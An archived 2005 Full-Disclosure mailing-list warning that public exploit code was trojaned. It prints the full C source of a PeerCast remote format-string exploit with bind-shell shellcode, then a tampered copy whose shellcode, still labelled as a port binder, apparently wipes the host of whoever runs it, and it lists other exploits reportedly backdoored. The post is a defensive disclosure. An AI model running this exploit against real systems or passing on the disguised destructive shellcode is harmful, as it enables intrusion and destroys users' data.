[Full-disclosure] Beware trojaned exploits!

securitymarket_at_hush.ai
Date: 07/27/05

  • Next message: J.A. Terranson: "[Full-disclosure] Our Industry Is Seriously Ethics Impaired"
    Date: Tue, 26 Jul 2005 19:55:10 -0700
    To: <full-disclosure@lists.grok.org.uk>
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hackers may be at risk!

    It has come to our attention that a large amount of public
    security exploits/software have been modified and re-posted
    to legitimate trusted information sites for public downloads.

    We have recently came across 5 exploits that have had a shellcode
    modification
    after legit verification of trusted download sites.

    The following information security sites have listed a number of
    modified exploits:

    unl0ck security research
    g0tfault security
    m00 security

    Unl0ck was recently broken into by a anti-security/hacker
    organization
    named dikline (dikline.com ?) and ALL exploit sources were modified
    in different
    ways to infect the host attempting to exploit them.

    Numerous modified sources of "internal" / "0day" sources by a
    security group named "m00 security" have also been reported as
    modified by
    the dikline organization.

    We have audited numerous public exploit code's and have come up
    with some interesting
    results. The following is a clear example of modified shellcode to:

    Original shellcode of the exploit "p33r-b33r.c" by unl0ck:

    /*
    \ PeerCast <= 0.1211 remote format string exploit
    / [<< Public Release >>]
    \
    / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
    \
    / uKt researcherz [ http://unl0ck.org ]
    \
    / greetz goes to: uKt researcherz.
    \
    /
    \ - smallest code - better code!!!
    /
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdarg.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>

    //*******************************************
    #define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
    }
    //*******************************************

    //****************************************************************
    char shellcode[] = // binds 4444 port
    "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
    "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
    "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
    "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
    "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
    "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
    "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
    //****************************************************************

    //****************************
    #define HOST "127.0.0.1"
    #define PORT 7144
    #define GOTADDR 0x0809da9c
    #define SHELLADDR 0x49adb23c
    //****************************

    //******************************************************************
    *****
    char *
    evil_builder( unsigned int retaddr, unsigned int offset, unsigned
    int base, long figure )
    {
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;

    doit( b0, b1, b2, b3, retaddr );
    buf = (char *)malloc(999);
    memset( buf, 0, 999 );

    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;

    snprintf( buf, 999,
    "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
    b3 - 16 + start - base, offset,
    b2 - b3 + start, offset + 1,
    b1 - b2 + start, offset + 2,
    b0 - b1 + start, offset + 3 );

    return buf;
    }
    //******************************************************************
    *******

    //******************************************************************
    *******
    int
    main( int argc, char * argv[] )
    {
    struct sockaddr_in addr;
    int sock;
    char * fmt;
    char endian[31337], da_shell[31337];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;

    system("clear");
    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit
    ^*^*^*\n");
    printf("*^*^*^ by Darkeagle ^*^*^*\n");
    printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

    memset( endian, 0x00, 31337 );
    memset( da_shell, 0x00, 31337 );

    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(HOST);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    locaddr = GOTADDR;
    retaddr = SHELLADDR;
    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will
    get AAAA41414141

    doit( b0, b1, b2, b3, locaddr );

    base = 4;
    printf("[*] Buildin' evil code\n");
    strcat(endian, "GET /html/en/index.html");
    snprintf( endian+strlen(endian), sizeof(endian),
    "%c%c%c%c"
    "%c%c%c%c"
    "%c%c%c%c"
    "%c%c%c%c",
    b3, b2, b1, b0,
    b3 + 1, b2, b1, b0,
    b3 + 2, b2, b1, b0,
    b3 + 3, b2, b1, b0 );

    fmt = evil_builder( retaddr, offset, base, 0x10 );

    memset(fmt+strlen(fmt), 0x55, 32);
    strcat(fmt, shellcode);
    strcat(endian, fmt);
    strcat(endian, "\r\n\r\n\r\n");
    printf("[+] Buildin' complete!\n");
    sprintf(da_shell, "telnet %s 4444", HOST);

    // just go, y0!
    printf("[*] Connectin'\n");
    if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
    printf("[-] Connection failed!\n\n");
    exit(0); }

    printf("[+] Connected!\n");
    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Sendin'\n");
    send(sock, endian, strlen(endian), 0);

    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Connectin' in da shell\n\n");
    sleep(1);
    system(da_shell);
    return 0;
    }

    - ----------- Replaced modified shellcode to rm-rf remote host:

    /*
    \ PeerCast <= 0.1211 remote format string exploit
    / [<< Public Release >>]
    \
    / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
    \
    / uKt researcherz [ http://unl0ck.org ]
    \
    / greetz goes to: uKt researcherz.
    \
    /
    \ - smallest code - better code!!!
    /
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdarg.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>

    //*******************************************
    #define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
    }
    //*******************************************

    //****************************************************************
    char shellcode[] = // binds 4444 port
    "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
    "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
    "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
    "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
    "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
    "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
    "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
    "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
    //****************************************************************

    The above shellcode is a modified version that was found listed
    on the unl0ck security website under downloads days before the
    site went down.

    We have audited and found differences in shellcode on the following
    code:

    (POSSIBLY MANY MORE)

    unrealmagic.c - shellcode modified to rm -rf /* host
    p33r-b33r.c - shellcode modified to rm -rf /* host
    0x666-ftpd.c - shellcode modified to rm -rf /* host
    gotfault-htdead.c - shellcode modified to rm -rf /* host
    gotfault-lcdproc.c - shellcode modified to install LKM
    gotfault-newspost.c - shellcode modified to rm -rf /* host
    gotfault-ngircd.c - shellcode modified to rm -rf /* host
    gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
    gotfault-openftpd-msg.c - shellcode modified to install LKM
    gotfault-pbs4q.c - shellcode modified to add password to mail users
    gotfault-putty.c - shellcode modified to install LKM
    gotfault-realmagicV2.c - shellcode modified to install LKM
    gotfault-sing.sh - shellcode modified to install unknown backdoor.
    gotfault-vmpsd.c - shellcode modified to rm -rf /* host
    gotfault-zebedee.c - shellcode modified to rm -rf /* host
    gotfault-zebedee-win32.zip - unknown
    gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
    gotfault-3cdsmash.c - shellcode modified to install NEW LKM
    gotfault-psoproxy.c - shellcode modified to install LKM
    gotfault-pcwsd.c - shellcode modified to install LKM

    This is an urgent notice to all of the security individuals who
    have downloaded
    any of the above (and more) exploits. Please take note to your
    collections
    we must find out what this dikline organization has backdoor'd and
    fix it!

    *** MAKE SURE to check your shellcode whenever possible.

    -----BEGIN PGP SIGNATURE-----
    Note: This signature can be verified at https://www.hushtools.com/verify
    Version: Hush 2.4

    wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA
    njACLQnU0QQDfXtKglEjX7ko5TdA
    =nU9l
    -----END PGP SIGNATURE-----

    Concerned about your privacy? Follow this link to get
    secure FREE email: http://www.hushmail.com/?l=2

    Free, ultra-private instant messaging with Hush Messenger
    http://www.hushmail.com/services-messenger?l=434

    Promote security and make money with the Hushmail Affiliate Program:
    http://www.hushmail.com/about-affiliate?l=427

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: J.A. Terranson: "[Full-disclosure] Our Industry Is Seriously Ethics Impaired"

    Relevant Pages

    • [EXPL] WebDAV Exploit Code Released
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability in WebDAV allows a remote attacker to cause the server to ... my $host; # Host being probed. ... }; # end host subroutine. ...
      (Securiteam)
    • Re: McAfee and Comcast
      ... The reason I wanted to check it out is both their anti-virus and firewall include HIPS (host intrusion protection system) which would integrate well together. ... I'm just using the free versions so not all the security features are there. ...
      (microsoft.public.windowsxp.basics)
    • Re: McAfee and Comcast
      ... I wanted to check it out is both their anti-virus and firewall include ... HIPS (host intrusion protection system) which would integrate well ... versions so not all the security features are there. ...
      (microsoft.public.windowsxp.basics)
    • Re: McAfee and Comcast
      ... I wanted to check it out is both their anti-virus and firewall include ... HIPS (host intrusion protection system) which would integrate well ... versions so not all the security features are there. ...
      (microsoft.public.windowsxp.basics)
    • Re: Your opinion matters
      ... If all you want is some overall rating of your document, well, it is too simplistic and wanders off on topics that have nothing to do with securing the *host*. ... You talk about security of e-mail but that doesn't secure your host. ... Only one account gets automatically created during the setup: ... The other accounts are those created by the admin *user* and AFTER the install, so it up to the admin to decide who gets admin rights, not the setup program that isn't running anymore. ...
      (microsoft.public.windowsxp.general)